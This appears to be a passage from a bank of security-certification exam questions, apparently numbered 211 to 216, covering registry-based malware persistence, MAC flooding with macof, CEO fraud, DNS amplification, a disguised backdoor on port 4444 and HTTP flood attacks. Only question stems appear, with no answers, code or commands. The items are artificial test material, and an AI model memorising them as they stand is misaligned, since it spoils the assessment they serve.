A security analyst reviews a sandbox report for a suspicious executable. The report shows that the executable modified the Windows registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to add a new entry pointing to itself. This action is characteristic of which type of malware?

Question 212 (hard, multiple choice)

During a penetration test, you run the tool 'macof' against a switch. After a few seconds, the switch starts flooding frames out all ports. Which attack have you successfully executed, and what is the primary goal of this technique?

Question 213 (easy, multiple choice)

An attacker sends an email that appears to come from the CEO of the company, requesting an urgent wire transfer to a specific account. This is an example of which social engineering attack?

Question 214 (medium, multi select)

A network administrator notices unusual traffic patterns: the internal DNS server is receiving large DNS queries with the source IP spoofed to appear as the internal DNS server itself. The queries appear to be amplification requests. Which TWO characteristics describe this attack?

Question 215 (hard, multi select)

During a forensic investigation, you find a file named 'svch0st.exe' in the startup folder. The file has a suspicious icon and was downloaded from an untrusted source. Analysis shows it opens a backdoor on port 4444 and sends system information to a remote server. Which THREE best describe this malware and its characteristics?

Question 216 (medium, multi select)

A security analyst observes a sudden increase in network traffic from many external IPs targeting the company's web server with multiple HTTP GET requests to the same page (/index.php?page=home). The requests appear legitimate but are coming at a very high rate. Which TWO types of attack is the analyst most likely witnessing?
